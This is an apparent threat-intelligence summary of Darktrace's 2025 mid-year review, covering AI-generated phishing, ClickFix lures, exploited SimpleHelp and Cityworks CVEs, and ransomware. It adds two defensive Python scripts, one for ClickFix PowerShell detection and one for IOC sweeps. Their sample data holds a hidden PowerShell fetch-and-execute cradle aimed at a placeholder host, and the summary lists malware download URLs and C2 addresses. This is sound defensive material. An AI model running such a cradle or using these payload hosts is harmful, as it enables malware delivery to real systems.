2025 Cyber Threats: A Mid‑Year Review

Darktrace observed threat actors increasingly using AI, notably LLMs, to scale phishing and social‑engineering campaigns and make them more convincing, alongside continued exploitation of internet‑facing systems and fast‑moving ransomware activity driven by Ransomware‑as‑a‑Service affiliates. Notable threats and IOCs included LameHug, ClickFix campaigns, exploitation of SimpleHelp CVEs, ransomware families such as Qilin, RansomHub and Lynx, and persistent malware such as Raspberry Robin and Auto-Color.

Key points

  • Threat actors increasingly leverage AI/LLMs to generate large volumes of convincing phishing emails; Darktrace detected over 12.6 million malicious emails from Jan–May 2025.
  • VIPs were heavily targeted, receiving over 25% of phishing emails, and 32% of phishing messages contained high text volume or multistage payloads, consistent with potential LLM use.
  • ClickFix social‑engineering campaigns resurged in Mar–Apr 2025, tricking users into executing PowerShell via fake CAPTCHA plugins on compromised or fraudulent sites.
  • Ransomware operations (RaaS) such as Qilin, RansomHub, and Lynx increased attack speed and complexity; affiliates used varied initial access techniques, making pre‑encryption detection difficult.
  • Threat actors continued to exploit known CVEs despite available patches (e.g., SimpleHelp CVE-2024-57727/57728; Trimble Cityworks CVE-2025-0994), often targeting internet‑facing devices and CNI software.
  • SaaS account compromise and phishing kits (FlowerStorm, Mamba2FA) enabled bypasses of MFA and increased SaaS‑targeted ransomware and data exfiltration risk.
  • Persistent malware families and tools—Raspberry Robin, AsyncRAT, Gh0stRAT, Amadey, Stealc, GhostSocks, Auto-Color—remained active, often serving as initial access brokers or follow‑on payloads.

MITRE Techniques

  • [T1566] Phishing – Email-based phishing campaigns generated at scale, including high‑text and multistage payload messages: “The total number of malicious emails detected… was over 12.6 million” (used to deliver credential harvesting and malware).
  • [T1204] User Execution – ClickFix social engineering coerced users to execute PowerShell via fake CAPTCHA plugins: “users believe they are completing human verification… guided through a series of simple steps to execute PowerShell code on their system.”
  • [T1110] Brute Force/Valid Accounts – Credential abuse for initial access to RDP/VPN and SaaS accounts: “threat actors abusing compromised credentials to gain initial entry into networks via… RDP servers and virtual private networks (VPNs).”
  • [T1530] Data from Cloud Storage – SaaS account compromise and file encryption in SaaS platforms leading to data encryption/exfiltration: “The encryption of files within SaaS environments… SaaS accounts are often less protected because of Single Sign‑On (SSO).”
  • [T1210] Exploitation of Remote Services – Exploitation of public-facing services and CVEs including SimpleHelp (CVE-2024-57727/57728) and Trimble Cityworks (CVE-2025-0994): “Medusa ransomware group’s use of the SimpleHelp vulnerabilities… CVE-2025-0994… Darktrace observed signs of exploitation as early as January 19.”
  • [T1071] Application Layer Protocol – Use of web-based C2 and malicious downloads (HTTP/HTTPS) to deliver payloads and C2 communications: examples include “192.210.239[.]172:3219/z44.exe” and multiple HTTP URL C2s.
  • [T1588] Obtain Capabilities – Use of MaaS/RaaS and phishing kits (FlowerStorm, Mamba2FA) to obtain and deploy malware and MFA-bypassing capabilities: “The rise of phishing kits like FlowerStorm and Mamba2FA… enable phishing and abuse users’ trust by mimicking legitimate services to bypass multi‑factor authentication.”
  • [T1078] Valid Accounts – SaaS and service account compromise through credential theft and phishing enabling lateral movement and access: “Credentials remain the weak link… Unauthorized access to SaaS accounts.”
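The ClickFix lure described under T1204 (and in the key points above) ends with the user pasting a PowerShell command into the Run dialog or a terminal, so the first host-side signal is a PowerShell process whose parent is explorer.exe, a browser or a shell, with a hidden window, an encoded command or a download-and-execute cradle on its command line. The following detection logic is an added example written for this summary, not Darktrace code; the process events are constructed to look like Sysmon Event ID 1 / EDR process-creation records, and the indicator weights and thresholds are heuristics chosen for illustration.

```python
"""Heuristic detection of ClickFix-style PowerShell execution.

Added example (not Darktrace's tooling). Events are constructed telemetry;
weights and thresholds are illustrative assumptions, not a vendor rule.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str   # command line as logged


# Parents that mean the user launched the command themselves: the Run dialog is
# hosted by explorer.exe; some lures have the victim paste into a browser or shell.
USER_DRIVEN_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "cmd.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

EXEC_VERB = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_VERB = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", re.I)

# (label, weight, predicate over the command line)
INDICATORS = [
    ("hidden_window", 2,
     lambda c: re.search(r"-w(?:indowstyle)?\s+h(?:idden)?\b", c, re.I) is not None),
    ("encoded_command", 2,
     lambda c: re.search(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", c, re.I) is not None),
    ("download_cradle", 2,
     lambda c: EXEC_VERB.search(c) is not None and DOWNLOAD_VERB.search(c) is not None),
    ("remote_url", 1, lambda c: re.search(r"https?://", c, re.I) is not None),
    ("bypass_policy", 1,
     lambda c: re.search(r"-ex(?:ecutionpolicy)?\s+bypass", c, re.I) is not None),
]


def basename(path: str) -> str:
    # ntpath handles Windows paths even when this runs on Linux.
    return ntpath.basename(path).lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator labels); non-PowerShell images score 0."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return 0, []
    hits = [label for label, _, pred in INDICATORS if pred(ev.command_line)]
    score = sum(w for label, w, _ in INDICATORS if label in hits)
    return score, hits


def detect_clickfix(events: list[ProcessEvent]) -> list[dict]:
    """Alert on suspicious PowerShell; a user-driven parent lowers the bar."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        threshold = 2 if basename(ev.parent_image) in USER_DRIVEN_PARENTS else 4
        if score >= threshold:
            alerts.append({"parent": basename(ev.parent_image), "score": score,
                           "indicators": hits, "command_line": ev.command_line})
    return alerts


# Constructed sample events (hosts are placeholders, not real infrastructure).
SAMPLE_EVENTS = [
    # Typical ClickFix outcome: Run dialog -> hidden PowerShell fetching and running code.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 'powershell -w hidden -c "iex (irm http://captcha-verify.example.invalid/ok)"'),
    # Legitimate scheduled-task script: bypass flag alone, non-interactive parent.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    # Benign interactive use.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", "powershell Get-ChildItem"),
    # Pasted from a browser: encoded command (base64 of UTF-16LE "Write-Host hi").
    ProcessEvent(r"C:\Program Files\PowerShell\7\pwsh.exe",
                 r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 "pwsh -enc VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA="),
]

if __name__ == "__main__":
    for a in detect_clickfix(SAMPLE_EVENTS):
        print(a["score"], a["parent"], a["indicators"], a["command_line"])
```

The user-driven parent is what distinguishes ClickFix from ordinary scripted PowerShell: the same cradle launched by a scheduler or management agent deserves review but should not trip the low threshold, which is why the sample backup task stays below it.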

Indicators of Compromise

  • [Hostname] LapDogs ORB C2 and other campaign hosts – www.northumbra[.]com, windows-cam.casacam[.]net
  • [IP Address] C2 and malicious hosts – 192.210.239[.]172 (malicious download), 213.183.63[.]41 (SimpleHelp C2)
  • [URL] Malicious download and payload URLs – 192.210.239[.]172:3219/z44.exe, 192.238.133[.]162:7744/1-111.exe
  • [CVE] Exploited vulnerabilities – CVE-2025-0994 (Trimble Cityworks), CVE-2024-57727 & CVE-2024-57728 (SimpleHelp)
  • [SHA1/MD5 hashes] Malware payload hashes (examples) – 8e9dec3b028f2406a8c546a9e9ea3d50609c36bb (SHA1), f891c920f81bab4efbaaa1f7a850d484 (MD5), and 12 more hashes
  • [Malware/Tool Names] Observed families and kits – Amadey, Stealc, GhostSocks, Raspberry Robin, AsyncRAT (used as follow‑on payloads and in initial access broker (IAB) activity)
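The indicators above are defanged (`[.]` in place of `.`), so they have to be refanged and typed before they can be matched against telemetry. The script below is an added example, not Darktrace's tooling: it refangs the hostnames, IPs, URLs and hashes listed in this summary, classifies each one, and sweeps a few constructed proxy, DNS and EDR log lines for them, using boundary-aware patterns so that an IP such as 192.210.239[.]172 does not also match 192.210.239.17.

```python
"""Refang the IOCs from this summary and sweep sample logs for them.

Added example (not Darktrace code). The indicators are the ones listed
above; the log lines are constructed for the demonstration.
"""
import re
from collections import namedtuple

Match = namedtuple("Match", "line_no ioc_type ioc")

RAW_IOCS = [
    "www.northumbra[.]com",
    "windows-cam.casacam[.]net",
    "192.210.239[.]172",
    "213.183.63[.]41",
    "192.210.239[.]172:3219/z44.exe",
    "192.238.133[.]162:7744/1-111.exe",
    "8e9dec3b028f2406a8c546a9e9ea3d50609c36bb",   # SHA1 from the list above
    "f891c920f81bab4efbaaa1f7a850d484",           # MD5 from the list above
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"


def refang(ioc: str) -> str:
    """Undo common defanging conventions."""
    return (ioc.replace("[.]", ".").replace("(.)", ".")
               .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def classify(ioc: str) -> str:
    if re.fullmatch(r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}", ioc, re.I):
        return "hash"
    if re.fullmatch(IPV4, ioc):
        return "ip"
    if re.fullmatch(IPV4 + r"(?::\d+)?/.*", ioc) or re.match(r"https?://", ioc):
        return "url"
    if re.fullmatch(r"[a-z0-9.-]+\.[a-z]{2,}", ioc, re.I):
        return "hostname"
    return "unknown"


def compile_ioc(ioc: str):
    """Return (type, compiled pattern) with boundaries suited to each IOC type."""
    kind = classify(ioc)
    if kind == "ip":
        # No digit or dot on either side: 192.210.239.172 must not match 192.210.239.17
        pat = re.compile(r"(?<![\d.])" + re.escape(ioc) + r"(?![\d.])")
    elif kind == "hostname":
        # Allow a preceding '.' so subdomains of the listed host still match.
        pat = re.compile(r"(?<![\w-])" + re.escape(ioc) + r"(?![\w-])", re.I)
    elif kind == "url":
        # Match on host:port/path regardless of scheme.
        pat = re.compile(re.escape(re.sub(r"^https?://", "", ioc)), re.I)
    elif kind == "hash":
        pat = re.compile(r"(?<![0-9a-fA-F])" + re.escape(ioc) + r"(?![0-9a-fA-F])", re.I)
    else:
        return None
    return kind, pat


def sweep(log_lines: list[str], raw_iocs=RAW_IOCS) -> list[Match]:
    compiled = [(refang(i), compile_ioc(refang(i))) for i in raw_iocs]
    matches = []
    for n, line in enumerate(log_lines, 1):
        for ioc, c in compiled:
            if c and c[1].search(line):
                matches.append(Match(n, c[0], ioc))
    return matches


# Constructed log lines; internal addresses and answers use documentation ranges.
SAMPLE_LOGS = [
    "2025-03-14T10:22:01Z proxy src=10.0.0.5 dst=192.210.239.172:3219 method=GET "
    "url=http://192.210.239.172:3219/z44.exe status=200",
    "2025-03-14T10:22:09Z dns src=10.0.0.5 query=www.northumbra.com type=A answer=203.0.113.10",
    "2025-03-14T10:23:44Z proxy src=10.0.0.7 dst=192.210.239.17:443 method=GET "
    "url=https://192.210.239.17/ status=200",   # near-miss IP, must not match
    "2025-03-14T10:25:13Z edr host=WS-042 event=file_create path=C:\\Users\\Public\\z44.exe "
    "sha1=8E9DEC3B028F2406A8C546A9E9EA3D50609C36BB",
    "2025-03-14T10:30:00Z dns src=10.0.0.9 query=updates.example.invalid type=A answer=198.51.100.4",
]

if __name__ == "__main__":
    for m in sweep(SAMPLE_LOGS):
        print(f"line {m.line_no}: {m.ioc_type} {m.ioc}")
```

A hit on the download URL and on the bare IP from the same line is reported twice on purpose; the IP match survives even after the payload path changes, which is the usual reason to keep both types in the watchlist.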

Read more: https://www.darktrace.com/blog/2025-cyber-threat-landscape-darktraces-mid-year-review